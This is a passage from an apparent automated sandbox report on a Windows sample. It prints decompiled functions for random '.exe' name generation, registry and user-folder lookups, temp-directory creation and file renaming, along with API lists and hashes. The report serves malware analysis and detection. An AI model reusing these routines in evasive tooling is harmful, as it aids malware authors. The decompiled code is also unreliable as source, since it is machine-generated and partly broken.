					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x4228e4);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E004163E4( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x0041d0d2
0x0041d0d6
0x0041d147
0x00000000
0x0041d0e1
0x0041d0ed
0x0041d0f1
0x00000000
0x0041d0f8
0x0041d0fc
0x0041d100
0x0041d108
0x0041d108
0x0041d111
0x0041d117
0x0041d127
0x0041d12f
0x0041d136
0x0041d139
0x0041d13f
0x0041d143
0x00000000
0x0041d143
0x0041d0f1

APIs

GetUpdateRect.USER32 ref: 0041D14E

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

TlsGetValue.KERNEL32 ref: 0041D0E7
SaveDC.GDI32(?), ref: 0041D117
SendMessageW.USER32(?,00000014,?,00000000), ref: 0041D127
RestoreDC.GDI32(?,00000000), ref: 0041D139

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: f58e50dc5b0b3840877e670f8ee31cb4fe6458e4cfda62fc0ef0735a55986b42
Instruction ID: dfcf81710e7760d5bff092318ac76a06538e2be656ec84d3a90c09c4958d5097
Opcode Fuzzy Hash: f58e50dc5b0b3840877e670f8ee31cb4fe6458e4cfda62fc0ef0735a55986b42
Instruction Fuzzy Hash: 4611A075500304BFCB219F25DD48FDB7BA8EB48315F048427FA9692261C338D480CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041D2BC, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041D2BC() {
				struct tagMSG _v32;
				signed int _t12;
				intOrPtr _t15;
				char _t17;
				intOrPtr _t19;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x4228ec);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					__eflags = _t12;
					if(_t12 == 0) {
						break;
					} else {
						__eflags = _v32.message -  *0x4228e8; // 0x0
						if(__eflags == 0) {
							__eflags = _v32.wParam - 0xfffffffc;
							if(_v32.wParam == 0xfffffffc) {
								_t15 =  *0x4228f0; // 0x0
								__eflags = _t15 + 0x114;
								_t17 = E0041CB6F(_t15 + 0x114, _t19, _t21, 0x4228e0, _v32.lParam, 1);
								_t19 =  *0x4228f0; // 0x0
								 *((char*)(_t19 + 0x124)) = _t17;
								SetEvent( *0x4228ec);
							}
						}
						continue;
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x0041d2d0
0x0041d2e2
0x0041d331
0x0041d33c
0x0041d341
0x00000000
0x00000000
0x0041d2ec
0x0041d2ee
0x00000000
0x0041d2f0
0x0041d2f4
0x0041d2fa
0x0041d2fc
0x0041d301
0x0041d303
0x0041d30e
0x0041d318
0x0041d31d
0x0041d323
0x0041d32f
0x0041d32f
0x0041d301
0x00000000
0x0041d2fa
0x0041d2ee
0x0041d34f

APIs

GetCurrentThread.KERNEL32 ref: 0041D2C9
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,0040F9B0), ref: 0041D2D0
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,0040F9B0), ref: 0041D2E2
SetEvent.KERNEL32(004228E0,?,00000001), ref: 0041D32F
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0041D33C

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: ec18cc511b171f337ac4f5ded15f3fa45029ed5c99915672c8faf7799f9e387a
Instruction ID: f1b69dc143f6442aa48f09b4da76312fe2c2d4498743a811e3a4fc689a248b7f
Opcode Fuzzy Hash: ec18cc511b171f337ac4f5ded15f3fa45029ed5c99915672c8faf7799f9e387a
Instruction Fuzzy Hash: 4001B931A043056BC720BB65EE45B9A77A8AB44730F50037AF970D61F0C7B4D451D79E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE22, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
ReleaseMutex.KERNEL32(?), ref: 0040CE5C
IsWindow.USER32(?), ref: 0040CE63
PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D
SendMessageW.USER32(?,00000215,00000000,?), ref: 0040CE85

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: b7e776a086b3b57f2ecc66f7c7621c16f89a654302d46be2cd447bee19a47800
Instruction ID: 21c0276351e8634cd14211af09d9d14dc3b72c189a50405b9dbfab97c03c702f
Opcode Fuzzy Hash: b7e776a086b3b57f2ecc66f7c7621c16f89a654302d46be2cd447bee19a47800
Instruction Fuzzy Hash: 98F01974208300DFD3209F24DD88966BBB4FB88711B044A7DF89AA33B1C770A848CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041A727, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A727(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E0041772D(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E004176E1();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E004176E1() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E004176E1() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E0041772D(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x0041a73c
0x0041a73e
0x0041a741
0x0041a746
0x0041a750
0x0041a75e
0x0041a765
0x0041a752
0x0041a752
0x0041a755
0x0041a755
0x0041a768
0x0041a76a
0x0041a76d
0x0041a772
0x0041a77e
0x0041a781
0x0041a785
0x0041a791
0x0041a79f
0x0041a7a6
0x0041a793
0x0041a793
0x0041a796
0x0041a796
0x0041a7a9
0x0041a7a9
0x0041a7b0
0x0041a7c6
0x0041a7c9
0x0041a7fa
0x0041a7e7
0x0041a7e9
0x0041a7ea
0x0041a7ea
0x0041a802
0x0041a806
0x0041a807
0x0041a80a
0x0041a813
0x0041a813
0x0041a81a
0x0041a835
0x0041a820
0x0041a820
0x0041a823
0x0041a827
0x0041a82d
0x0041a830
0x0041a831
0x00000000
0x00000000
0x0041a833
0x00000000
0x0041a831
0x0041a827
0x0041a838
0x0041a838
0x0041a83e
0x0041a842
0x0041a848
0x0041a84e
0x0041a84e
0x0041a855

APIs

Part of subcall function 004176E1: GetTickCount.KERNEL32 ref: 004176E1

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A848

Strings

aeiouy, xrefs: 0041A755, 0041A75E, 0041A796, 0041A79F
.exe, xrefs: 0041A732
bcdfghklmnpqrstvwxz, xrefs: 0041A746

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: 279d27c63a1b12d8c7cd95e40054647b493df084a6177ad84f6652389f6a22de
Instruction ID: f0f18a3186838922c56157931b3056ffbeda769d93fd2ca599884456a1bd5665
Opcode Fuzzy Hash: 279d27c63a1b12d8c7cd95e40054647b493df084a6177ad84f6652389f6a22de
Instruction Fuzzy Hash: 35317075E012099BCB11EFA9C1452EEB7B0EF44314F64806BD921AB280D378DA91CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD7E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040AD7E(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E0041645B( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E0040FA33(_t28,  &_v116);
				_t30 = 0x61;
				E0040FA33(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E0041A4CC(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E0040AB36(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E004163A8(_v12);
					}
					_push(0xcb);
					return E004099E1(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E0040FA33(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0041BAD3( &_v636,  &_v16, _t68, 1, 2, E0040AB90,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0040ad7e
0x0040ad7e
0x0040ad93
0x0040ad9d
0x0040ad9e
0x0040ada8
0x0040ada9
0x0040adbc
0x0040adc7
0x0040adcf
0x0040add1
0x0040add3
0x0040ade0
0x0040adf1
0x0040adf1
0x0040add3
0x0040adf9
0x0040ae61
0x0040ae61
0x00000000
0x0040ae78
0x0040ae66
0x00000000
0x0040adfb
0x0040adfd
0x0040ae00
0x0040ae01
0x0040ae08
0x0040ae0f
0x0040ae16
0x0040ae1d
0x0040ae20
0x0040ae22
0x0040ae22
0x0040ae30
0x0040ae36
0x0040ae38
0x0040ae4a
0x0040ae53
0x0040ae53
0x0040ae58
0x0040ae59
0x0040ae5e
0x00000000
0x0040ae5e

APIs

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040ADE0
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040AE30

Strings

#, xrefs: 0040AE08
&, xrefs: 0040AE16

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 5d8815c3a9d2aa7bfa6a9eb485c7623a0aa7105e154b4724a89e4bcf204dca36
Instruction ID: 1ac8d9ba4bf02b825aecd231ad752b1442e59bdafd182cef3b5a5227f163e12a
Opcode Fuzzy Hash: 5d8815c3a9d2aa7bfa6a9eb485c7623a0aa7105e154b4724a89e4bcf204dca36
Instruction Fuzzy Hash: A33141B2D40218BADF20EAA0DC89EDF777DEB04308F10457BF605F7181D6789A998B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B62E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040B62E(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E0041645B( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E0040FA33(_t28,  &_v120);
				_t30 = 0x78;
				E0040FA33(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E0041A4CC(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E0040B3D1(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E004163A8(_v12);
					}
					_push(0xcb);
					return E004099E1(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E0040FA33(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0041BAD3( &_v644,  &_v16, _t68, 1, 2, E0040B409,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0040b62e
0x0040b62e
0x0040b643
0x0040b64d
0x0040b64e
0x0040b658
0x0040b659
0x0040b66c
0x0040b677
0x0040b67f
0x0040b681
0x0040b683
0x0040b690
0x0040b6a1
0x0040b6a1
0x0040b683
0x0040b6a9
0x0040b711
0x0040b711
0x00000000
0x0040b728
0x0040b716
0x00000000
0x0040b6ab
0x0040b6ad
0x0040b6b0
0x0040b6b1
0x0040b6b8
0x0040b6bf
0x0040b6c6
0x0040b6cd
0x0040b6d0
0x0040b6d2
0x0040b6d2
0x0040b6e0
0x0040b6e6
0x0040b6e8
0x0040b6fa
0x0040b703
0x0040b703
0x0040b708
0x0040b709
0x0040b70e
0x00000000
0x0040b70e

APIs

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040B690
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040B6E0

Strings

&, xrefs: 0040B6BF
#, xrefs: 0040B6C6

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 4943f4c2dd022e3c878b6061b0b98becc5fa07f3d2f83119365f65502caf91b8
Instruction ID: 3a821a54bc86351cd1d50711d9884b64c3d97fc65b5f484b637e8ea21d14064e
Opcode Fuzzy Hash: 4943f4c2dd022e3c878b6061b0b98becc5fa07f3d2f83119365f65502caf91b8
Instruction Fuzzy Hash: BE3141B2D00218AADF209AA1DC85EDE777CEB44314F10457BF604F7181D7789A498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404D61, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D61(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x4223a8 == 0) {
					E0040F0DC(__ecx, 0x4223a8, 2);
					 *((short*)(E004163E4(0x4225b0, 0x4223a8, E00416EF7(0x4223a8) + _t10) + 0x4225b0)) = 0;
					_t3 = PathRemoveFileSpecW(0x4225b0);
				}
				if(_t13 != 0) {
					E00416749(_t3 | 0xffffffff, 0x4223a8, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x422e04 > 1) {
					E0041B9B1(0x4225b0);
					E00419A29(0x4225b0);
					_t3 = GetFileAttributesW(0x4223a8);
					if(_t3 != 0xffffffff) {
						return E00419A29(0x4223a8);
					}
				}
				return _t3;
			}

0x00404d61
0x00404d75
0x00404d79
0x00404d92
0x00404d99
0x00404d99
0x00404da1
0x00404daa
0x00404db5
0x00404db5
0x00404dc0
0x00404dcc
0x00404dd2
0x00404dd8
0x00404de1
0x00000000
0x00404de4
0x00404de1
0x00404deb

APIs

PathRemoveFileSpecW.SHLWAPI(004225B0,004225B0,004223A8,00000000,00000002,?,?,004053B9,00000000,?,00000000,00000318,?,?,00000102), ref: 00404D99
PathRenameExtensionW.SHLWAPI(?,.tmp,?,?,004053B9,00000000,?,00000000,00000318,?,?,00000102), ref: 00404DB5
GetFileAttributesW.KERNEL32(004223A8,004225B0,004225B0,?,?,004053B9,00000000,?,00000000,00000318,?,?,00000102), ref: 00404DD8

Part of subcall function 0040F0DC: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155

Strings

.tmp, xrefs: 00404DAF

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp
API String ID: 3627892477-2986845003
Opcode ID: 03b235db2e8e5c9de1891f7133d78c4fd731c3ed89e54fdb4a1e4521fd320cfc
Instruction ID: 8715d0874576f80325629d2be52c9f05014a4e8750de57ed776ddc91c1fcbcde
Opcode Fuzzy Hash: 03b235db2e8e5c9de1891f7133d78c4fd731c3ed89e54fdb4a1e4521fd320cfc
Instruction Fuzzy Hash: 69F0ADB47012503AD62133369D99ABF26599FC2724F48427FF511B11E2CBBC8C8682AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9B1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B9B1(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x0041b9b3
0x0041b9ba
0x0041b9c2
0x0041b9c6
0x0041b9c8
0x0041b9c8
0x0041b9ca
0x0041b9ca
0x0041b9d0
0x00000000
0x00000000
0x0041ba08
0x0041ba08
0x00000000
0x0041b9dc
0x0041b9dc
0x0041b9e1
0x0041b9ed
0x0041b9f8
0x0041b9f8
0x0041b9fe
0x0041ba12
0x0041ba15
0x0041ba00
0x0041ba03
0x0041ba0d
0x00000000
0x0041ba0d
0x0041ba05
0x00000000
0x0041ba05
0x0041b9fe

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,00409818,?,?,?,?,?), ref: 0041B9BC
GetFileAttributesW.KERNEL32(?,?,00000000,00409818,?,?,?,?,?), ref: 0041B9E4
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00409818,?,?,?,?,?), ref: 0041B9F2

Strings

.exe, xrefs: 0041B9B8

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: 89ea5dabdb69a1ae74796b9d5cdc0e3a786227b64b7e38f5ffc8dcfccd190e2b
Instruction ID: 4fc1a830e0316e2339356bde62ecdff554d82ca467e21fa9c322599df1756fc7
Opcode Fuzzy Hash: 89ea5dabdb69a1ae74796b9d5cdc0e3a786227b64b7e38f5ffc8dcfccd190e2b
Instruction Fuzzy Hash: 1DF0FC761512515AC6300E7648046F7B798DF11BF0B55452BEDD4E3360D7399CC392EC

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7AF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041B7AF(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E004176E1());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E0041709B(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0041BC2F(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0041b7d2
0x0041b828
0x00000000
0x0041b828
0x0041b7d4
0x0041b7d6
0x0041b7db
0x0041b7dc
0x0041b7eb
0x0041b7f1
0x0041b7f6
0x0041b7fc
0x00000000
0x00000000
0x0041b811
0x0041b822
0x0041b826
0x00000000
0x00000000
0x00000000
0x0041b830
0x00000000
0x0041b830
0x0041b811
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 0041B7C6

Part of subcall function 004176E1: GetTickCount.KERNEL32 ref: 004176E1

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0041B818

Strings

tmp, xrefs: 0041B7DC
%s%08x, xrefs: 0041B7E1

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: f4eee9356edaea47e23a212eab1d88da4f4d8a8ee39ced2ae2206dbfcfaae08c
Instruction ID: 1d04d7f4387e5e7115fc2907d10b2953b50f5a63a87d0dc4151b215f543c5e03
Opcode Fuzzy Hash: f4eee9356edaea47e23a212eab1d88da4f4d8a8ee39ced2ae2206dbfcfaae08c
Instruction Fuzzy Hash: 73F0DCB120022866DA20BA249C05BFF776CDB81B24F1001B2FA15E61E1E779DDC6D6DC

Uniqueness

Uniqueness Score: -1.00%

Function 00417BAF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417BAF(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x00417bb3
0x00417bbc
0x00417bc4
0x00417be6
0x00417bee
0x00417bc6
0x00417bcc
0x00417bd4
0x00000000
0x00417bd6
0x00417bdc
0x00417be0
0x00000000
0x00417be2
0x00417be5
0x00417be5
0x00417be0
0x00417bd4

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040E67D,00000000,0040EBA4), ref: 00417BBC
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00417BCC

Strings

kernel32.dll, xrefs: 00417BB7
IsWow64Process, xrefs: 00417BC6

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 00ad86c78921f555b2750e010b1ab6502140692f7f546da3edaec4ee2554cb13
Instruction ID: 08ecffd3716a4fa4c7f929e87bb611a86052d3b6d800b14c8ebfc81d271d5bba
